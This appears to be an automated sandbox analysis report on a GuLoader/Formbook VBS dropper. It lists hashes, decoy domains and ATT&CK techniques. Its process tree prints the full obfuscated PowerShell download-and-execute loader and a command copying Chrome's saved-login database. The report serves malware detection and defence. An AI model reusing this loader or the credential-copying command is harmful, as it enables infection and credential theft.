Overview

overview

10

Static

static

1

birectangular.vbs

windows7-x64

8

birectangular.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-07-2024 06:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    birectangular.vbs

  • Size

    413KB

  • MD5

    be6f44242b4afd0e61d775b9ef7946b0

  • SHA1

    80ce71becc7fb1203a43708d7e3fdcad778bb79e

  • SHA256

    8175ce9634dcd8deb29e81ae2f070d4b2f43ae2b4d154946a251ac93f1e87b59

  • SHA512

    e1778509074b9aad5fbc7de0947b887816c6f0308b4a347f181eb0dc92008125f7ef1b55184187d7c9cd99a6dfabb82ef858839cefa1185e1016ba0c3d45ba86

  • SSDEEP

    6144:Ps58yYxqthfv2vF5aa++uQ8YTbBrD0Dz1EhMqcwu+T7wtVuqo41SqW8ZdbU8se0s:GMZcfqHmfRpcLnkd

Score
10/10
formbookguloaderdd01downloaderpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

dd01

Decoy

1prostitutki-chelyabinska.com

o2v7c.rest

something-organized.com

etc99.store

perksaccess.contact

consuyt.xyz

dscmodelpapers.com

dana88.lat

dumange.com

pointlomabarreboutique.com

djtmaga.net

dentisttanger.com

17251604.com

dogcatshoponline.com

eppgrandeur.com

jyty3500.com

felixkang.asia

xn--22ck2ci1dl0f7b7h.com

milliesrecruitment.com

www333804000.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Formbook payload 1 IoCs
    rat
  • Adds policy Run key to start application 2 TTPs 1 IoCs
    persistence
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3456
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\birectangular.vbs"
      2⤵
      • Blocklisted process makes network request
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:5060
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Shoo: DamTKvldlP.tpsmorp1Unde2U.de ');$Skumredes=$Methodizing[0];$Asprout= (Jimmis 'ps,u$ ffgSpidlStiroBrasbAdozaRudilPa t:,espNCh pyS ydk iltr Me iAutot enpiN nnkGlobkUpcueR llrfor nE.iceDjuks Non=CataNSouteDksdwU og- eneOTeleb,egejTh seTarmc bu.tint, medlSDropyGirss.athtOpree,hormRock..ritNIridetroutModi.SengWKopieBeskbPrinCGiftl ,eri.yvteColin .nit');$Asprout+=$Myoplastic[1];Fluorideringen ($Asprout);Fluorideringen (Jimmis 'Sa.f$ EndNTidsyretskAu,irTykmiDesttUddaiemptkDybfkBoureNatirAfp,nDdedeInkls R,a.CaboHrodneno,taBlomdvac e BikrK,desAloe[ Lin$CalaN .eceBillu Konr.mbroTrykcPoliaCruenShamaVamplUnac1Iglo5Yaff1 Red]Peri=F,de$M,noH Co.oAzoro Au.spapieUntagCystoRverwMaci ');$Antilogical=Jimmis 'Nedl$ RakN Prey ,opktallrGadeiKonstVer iApatkSatsk uleOverrNontnKodeeInussBlou. In DGrafoSchww Rumn El l AfrogallaDen.d.aasFStr,iDis lCupeeUdrj(Tas,$Mo,lSCrumk K.vuHy,omKo,mrAgnoeTripdR steRandsCa.a,Mi.j$Coypt Lany AponFlokgFloweDyn.nPlind CareUnbo)S mp ';$tyngende=$Myoplastic[0];Fluorideringen (Jimmis 'Dagk$ChargH,rrlSprioklepb Bega SublJ.mb:beskBRevid scrl Beledgn rSamasDeci=Egen(Ha,fTPrikeOversSku,tIndh-bimaPV riaTurrtNycthL no Natu$ Prit PreyAgisnPladg ntie EurnPantdKnageBags) Vrl ');while (!$Bdlers) {Fluorideringen (Jimmis 'None$ U sgAffelBoploPsylbPengaBrunlHand: sabSGre,y killSanstDelae E.stStilj RhosAf.rk,agdr Udeu Bu.kImpukPraceTopm=Timb$TarptPog,rCoulust te.rbi ') ;Fluorideringen $Antilogical;Fluorideringen (Jimmis ' BarSOph.tHy,eaMangrAvertCh.r-TotaSCitrl.axieAfkleBadmpn,na Hove4Afha ');Fluorideringen (Jimmis ' Hyd$Convg Haal minoMultbK nta ucllAbno:rummBOutfdFortl TroeSkumrBlgesDist=Midt(AltsTKna.eGenisVeritBall-PatePToe.aNonmtTolkh Ri. .tvb$Sndet,epeyHal.nUrogg Forese snSvovdCradeS.bs)Inha ') ;Fluorideringen (Jimmis 'Stok$ etrgSucclSindo TigbRustaR nglA.ph:FiskGExter JetaVa,mm LaimTaleaspart UngePhoss.toc=drug$WishgJ.hnlTyveoBefubFen.a pojlSial:.kvaASu anUr,isKonft DertAuslemrkelMoh.sMe,heSy esDrn oKosmm RecrSl,daAt.laUnmidSno,eBa mtuds.sDepo+Co y+H,pa% Tri$AfmaMFre eEjentDog h DetoTr.ndSaltiHo,sz OmgiSwinnMortg ,il.DelecVaeroDetau Ye.nSquatVan ') ;$Skumredes=$Methodizing[$Grammates];}$Marmorgulvenes=308881;$Renhedsgraders=29541;Fluorideringen (Jimmis ' The$Arbeg Nu,l Jugo.rombHyloa Stol Cou:,riaSAadscTochynu hp.raph xoiReplfUdadoEnerrBattmArnk2Barn4Bra,5Af,a ,aug= For iliGKokuesttttBary-Kon CSvinoFejln Spit TreeumaanTvant Ind Beto$LinitMajoyOparnTordgE uieBannnStvld,etheSeis ');Fluorideringen (Jimmis ' Meg$AcclgKerblTrepo EnsbClinaHvidltrac:TeknUSillnDe,iaHa,pn,ejltUnliiT,syqSa,iuArenaAbr,tGenneTurvd Scl Mist= Alk pre,[ SegS Foly,abesFlyvt,ulpeSlagm.arj.CaddCPitcoSolbnRerov IndeUnh rLactt ira] Win: ete:FrakFD.ifrChi oM.ngmQuipBHypoa LilsRedhe St,6Sous4SlapSBnhrtTromr K riPropnAstigScus( Waa$H liSHou,cEtagyStnkpTheahFolkiIa,rfknudoProprAfgimSer,2Genn4Sp.r5Krum) Fri ');Fluorideringen (Jimmis 'Trip$StargRep,lOveroTylsbbesta UnplCoal:DigyBbrusoIn knBlreaass,iUnecrRusseTokr Ste.=Kili Mod[VirkS Ga,yImpusHypstGrfberelimElod. SutTFasaeS.atxu dat,jer.archEDogmnSlapc .inoPiledS.ggiFuninSmmegPh.s]Steg: ns: creAFakeSMalvCSn wI MetI m n.pos GEtagearchtUmidS engtAnstrAfskiCivinFilogRe a(Kerm$.ehjU.phenTonia AranTubat Da,iKl iqFondu heraA.amtDataeEnked ,or)Morb ');Fluorideringen (Jimmis 'Sulp$CestgPolylImmeoi.vobDiska Brul F.n:Hv,dP Bi.rresaiph,toOsterHicciRejet Srge StatSlidsForphL beaDetovUnevePigerSkleeJgernfaddsSk,a= Su.$UnwaBDev oAlarnprogaSpliiProtrMoldeRe.u.TrfssShapu I tbDeposTak tforbrVid i SphnGaargcor.(Harp$ ,erMAnneaWomarUnchm S.goForjrPedigFr,nuImpulFiscvkommeMellnPen eUr ts M.d,schm$MythRGentehus n arihfibeetjredVrngsGunsgNormrH.lba kardMo meWorkr Saus S.u)nabo ');Fluorideringen $Prioritetshaverens;"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2864
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"
          4⤵
            PID:4884
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Shoo: DamTKvldlP.tpsmorp1Unde2U.de ');$Skumredes=$Methodizing[0];$Asprout= (Jimmis 'ps,u$ ffgSpidlStiroBrasbAdozaRudilPa t:,espNCh pyS ydk iltr Me iAutot enpiN nnkGlobkUpcueR llrfor nE.iceDjuks Non=CataNSouteDksdwU og- eneOTeleb,egejTh seTarmc bu.tint, medlSDropyGirss.athtOpree,hormRock..ritNIridetroutModi.SengWKopieBeskbPrinCGiftl ,eri.yvteColin .nit');$Asprout+=$Myoplastic[1];Fluorideringen ($Asprout);Fluorideringen (Jimmis 'Sa.f$ EndNTidsyretskAu,irTykmiDesttUddaiemptkDybfkBoureNatirAfp,nDdedeInkls R,a.CaboHrodneno,taBlomdvac e BikrK,desAloe[ Lin$CalaN .eceBillu Konr.mbroTrykcPoliaCruenShamaVamplUnac1Iglo5Yaff1 Red]Peri=F,de$M,noH Co.oAzoro Au.spapieUntagCystoRverwMaci ');$Antilogical=Jimmis 'Nedl$ RakN Prey ,opktallrGadeiKonstVer iApatkSatsk uleOverrNontnKodeeInussBlou. In DGrafoSchww Rumn El l AfrogallaDen.d.aasFStr,iDis lCupeeUdrj(Tas,$Mo,lSCrumk K.vuHy,omKo,mrAgnoeTripdR steRandsCa.a,Mi.j$Coypt Lany AponFlokgFloweDyn.nPlind CareUnbo)S mp ';$tyngende=$Myoplastic[0];Fluorideringen (Jimmis 'Dagk$ChargH,rrlSprioklepb Bega SublJ.mb:beskBRevid scrl Beledgn rSamasDeci=Egen(Ha,fTPrikeOversSku,tIndh-bimaPV riaTurrtNycthL no Natu$ Prit PreyAgisnPladg ntie EurnPantdKnageBags) Vrl ');while (!$Bdlers) {Fluorideringen (Jimmis 'None$ U sgAffelBoploPsylbPengaBrunlHand: sabSGre,y killSanstDelae E.stStilj RhosAf.rk,agdr Udeu Bu.kImpukPraceTopm=Timb$TarptPog,rCoulust te.rbi ') ;Fluorideringen $Antilogical;Fluorideringen (Jimmis ' BarSOph.tHy,eaMangrAvertCh.r-TotaSCitrl.axieAfkleBadmpn,na Hove4Afha ');Fluorideringen (Jimmis ' Hyd$Convg Haal minoMultbK nta ucllAbno:rummBOutfdFortl TroeSkumrBlgesDist=Midt(AltsTKna.eGenisVeritBall-PatePToe.aNonmtTolkh Ri. .tvb$Sndet,epeyHal.nUrogg Forese snSvovdCradeS.bs)Inha ') ;Fluorideringen (Jimmis 'Stok$ etrgSucclSindo TigbRustaR nglA.ph:FiskGExter JetaVa,mm LaimTaleaspart UngePhoss.toc=drug$WishgJ.hnlTyveoBefubFen.a pojlSial:.kvaASu anUr,isKonft DertAuslemrkelMoh.sMe,heSy esDrn oKosmm RecrSl,daAt.laUnmidSno,eBa mtuds.sDepo+Co y+H,pa% Tri$AfmaMFre eEjentDog h DetoTr.ndSaltiHo,sz OmgiSwinnMortg ,il.DelecVaeroDetau Ye.nSquatVan ') ;$Skumredes=$Methodizing[$Grammates];}$Marmorgulvenes=308881;$Renhedsgraders=29541;Fluorideringen (Jimmis ' The$Arbeg Nu,l Jugo.rombHyloa Stol Cou:,riaSAadscTochynu hp.raph xoiReplfUdadoEnerrBattmArnk2Barn4Bra,5Af,a ,aug= For iliGKokuesttttBary-Kon CSvinoFejln Spit TreeumaanTvant Ind Beto$LinitMajoyOparnTordgE uieBannnStvld,etheSeis ');Fluorideringen (Jimmis ' Meg$AcclgKerblTrepo EnsbClinaHvidltrac:TeknUSillnDe,iaHa,pn,ejltUnliiT,syqSa,iuArenaAbr,tGenneTurvd Scl Mist= Alk pre,[ SegS Foly,abesFlyvt,ulpeSlagm.arj.CaddCPitcoSolbnRerov IndeUnh rLactt ira] Win: ete:FrakFD.ifrChi oM.ngmQuipBHypoa LilsRedhe St,6Sous4SlapSBnhrtTromr K riPropnAstigScus( Waa$H liSHou,cEtagyStnkpTheahFolkiIa,rfknudoProprAfgimSer,2Genn4Sp.r5Krum) Fri ');Fluorideringen (Jimmis 'Trip$StargRep,lOveroTylsbbesta UnplCoal:DigyBbrusoIn knBlreaass,iUnecrRusseTokr Ste.=Kili Mod[VirkS Ga,yImpusHypstGrfberelimElod. SutTFasaeS.atxu dat,jer.archEDogmnSlapc .inoPiledS.ggiFuninSmmegPh.s]Steg: ns: creAFakeSMalvCSn wI MetI m n.pos GEtagearchtUmidS engtAnstrAfskiCivinFilogRe a(Kerm$.ehjU.phenTonia AranTubat Da,iKl iqFondu heraA.amtDataeEnked ,or)Morb ');Fluorideringen (Jimmis 'Sulp$CestgPolylImmeoi.vobDiska Brul F.n:Hv,dP Bi.rresaiph,toOsterHicciRejet Srge StatSlidsForphL beaDetovUnevePigerSkleeJgernfaddsSk,a= Su.$UnwaBDev oAlarnprogaSpliiProtrMoldeRe.u.TrfssShapu I tbDeposTak tforbrVid i SphnGaargcor.(Harp$ ,erMAnneaWomarUnchm S.goForjrPedigFr,nuImpulFiscvkommeMellnPen eUr ts M.d,schm$MythRGentehus n arihfibeetjredVrngsGunsgNormrH.lba kardMo meWorkr Saus S.u)nabo ');Fluorideringen $Prioritetshaverens;"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3000
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"
              5⤵
                PID:5028
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                5⤵
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of AdjustPrivilegeToken
                PID:4560
        • C:\Windows\SysWOW64\explorer.exe
          "C:\Windows\SysWOW64\explorer.exe"
          2⤵
          • Adds policy Run key to start application
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4740
          • C:\Windows\SysWOW64\cmd.exe
            /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
            3⤵
              PID:1032
            • C:\Program Files\Mozilla Firefox\Firefox.exe
              "C:\Program Files\Mozilla Firefox\Firefox.exe"
              3⤵
                PID:1060

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Initial Access

          Execution

          Persistence

          Boot or Logon Autostart Execution

          2
          T1547

          Registry Run Keys / Startup Folder

          2
          T1547.001

          Privilege Escalation

          Boot or Logon Autostart Execution

          2
          T1547

          Registry Run Keys / Startup Folder

          2
          T1547.001

          Defense Evasion

          Modify Registry

          3
          T1112

          Credential Access

          Unsecured Credentials

          1
          T1552

          Credentials In Files

          1
          T1552.001

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          2
          T1082

          Lateral Movement

          Collection

          Data from Local System

          1
          T1005

          Exfiltration

          Command and Control

          Impact

          Resource Development

          Reconnaissance

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\DB1
            Filesize

            46KB

            MD5

            8f5942354d3809f865f9767eddf51314

            SHA1

            20be11c0d42fc0cef53931ea9152b55082d1a11e

            SHA256

            776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

            SHA512

            fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

            Download Submit
          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ojh34xrh.jyf.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit
          • C:\Users\Admin\AppData\Roaming\Concordal6.Uds
            Filesize

            440KB

            MD5

            f4415c58168b8b8d9bfbbf24d36c0d02

            SHA1

            4909c7fc652a2781b444d415ec9793272d3d4210

            SHA256

            3f92135f8bd19632fe290bd00acfb8c13d24ca9c0a2dbe562ef9f34adea67da0

            SHA512

            8de0ba1427ac8cf552edf80bc7911c354019e3dda2d1aa9063fcfbfb22cfc232ab41056d4c8b3dcfb8cec325263eb5cd6dbd62f1b366cfd67d0f0d458dd93057

            Download Submit
          • C:\Users\Admin\AppData\Roaming\J104S8QS\J10logim.jpeg
            Filesize

            80KB

            MD5

            ce30db8129c71356161a4828ecf97473

            SHA1

            2b32153f42696772636413143a5b5dbda0a1d10b

            SHA256

            2871e729c0ea03a96b3cc9c7b1b1240e8c5abd4ca805d8e1fd453315dc81cde4

            SHA512

            bc42eeed7bf95733f6e5fd1627680bce111e23fcc830bc7213fa063c2d155ea521e9f627aabec54f3e1b6f10fac62eff182bc6b05050faa9615022f4c17a2064

            Download Submit
          • C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrf.ini
            Filesize

            40B

            MD5

            2f245469795b865bdd1b956c23d7893d

            SHA1

            6ad80b974d3808f5a20ea1e766c7d2f88b9e5895

            SHA256

            1662d01a2d47b875a34fc7a8cd92e78cb2ba7f34023c7fd2639cbb10b8d94361

            SHA512

            909f189846a5d2db208a5eb2e7cb3042c0f164caf437e2b1b6de608c0a70e4f3510b81b85753dbeec1e211e6a83e6ea8c96aff896e9b6e8ed42014473a54dc4f

            Download Submit
          • C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrg.ini
            Filesize

            38B

            MD5

            4aadf49fed30e4c9b3fe4a3dd6445ebe

            SHA1

            1e332822167c6f351b99615eada2c30a538ff037

            SHA256

            75034beb7bded9aeab5748f4592b9e1419256caec474065d43e531ec5cc21c56

            SHA512

            eb5b3908d5e7b43ba02165e092f05578f45f15a148b4c3769036aa542c23a0f7cd2bc2770cf4119a7e437de3f681d9e398511f69f66824c516d9b451bb95f945

            Download Submit
          • C:\Users\Admin\AppData\Roaming\J104S8QS\J10logri.ini
            Filesize

            40B

            MD5

            d63a82e5d81e02e399090af26db0b9cb

            SHA1

            91d0014c8f54743bba141fd60c9d963f869d76c9

            SHA256

            eaece2eba6310253249603033c744dd5914089b0bb26bde6685ec9813611baae

            SHA512

            38afb05016d8f3c69d246321573997aaac8a51c34e61749a02bf5e8b2b56b94d9544d65801511044e1495906a86dc2100f2e20ff4fcbed09e01904cc780fdbad

            Download Submit
          • C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrv.ini
            Filesize

            872B

            MD5

            bbc41c78bae6c71e63cb544a6a284d94

            SHA1

            33f2c1d9fa0e9c99b80bc2500621e95af38b1f9a

            SHA256

            ee83c6bcea9353c74bfc0a7e739f3c4a765ace894470e09cdcdebba700b8d4cb

            SHA512

            0aea424b57adae3e14ad6491cab585f554b4dffe601b5a17bad6ee6177d2f0f995e419cde576e2d1782b9bddc0661aada11a2c9f1454ae625d9e3223635ec9f4

            Download Submit
          • memory/2864-4-0x00007FFF66B43000-0x00007FFF66B45000-memory.dmp
            Filesize

            8KB

            Download
          • memory/2864-16-0x00007FFF66B40000-0x00007FFF67601000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/2864-15-0x00007FFF66B40000-0x00007FFF67601000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/2864-52-0x00007FFF66B40000-0x00007FFF67601000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/2864-45-0x00007FFF66B40000-0x00007FFF67601000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/2864-44-0x00007FFF66B43000-0x00007FFF66B45000-memory.dmp
            Filesize

            8KB

            Download
          • memory/2864-14-0x0000029E237B0000-0x0000029E237D2000-memory.dmp
            Filesize

            136KB

            Download
          • memory/3000-39-0x0000000007550000-0x0000000007572000-memory.dmp
            Filesize

            136KB

            Download
          • memory/3000-33-0x0000000005EE0000-0x0000000006234000-memory.dmp
            Filesize

            3.3MB

            Download
          • memory/3000-40-0x0000000008760000-0x0000000008D04000-memory.dmp
            Filesize

            5.6MB

            Download
          • memory/3000-37-0x0000000006880000-0x000000000689A000-memory.dmp
            Filesize

            104KB

            Download
          • memory/3000-42-0x0000000008D10000-0x000000000C8CA000-memory.dmp
            Filesize

            59.7MB

            Download
          • memory/3000-36-0x0000000007B30000-0x00000000081AA000-memory.dmp
            Filesize

            6.5MB

            Download
          • memory/3000-35-0x0000000006330000-0x000000000637C000-memory.dmp
            Filesize

            304KB

            Download
          • memory/3000-19-0x00000000029D0000-0x0000000002A06000-memory.dmp
            Filesize

            216KB

            Download
          • memory/3000-34-0x00000000062F0000-0x000000000630E000-memory.dmp
            Filesize

            120KB

            Download
          • memory/3000-20-0x0000000005580000-0x0000000005BA8000-memory.dmp
            Filesize

            6.2MB

            Download
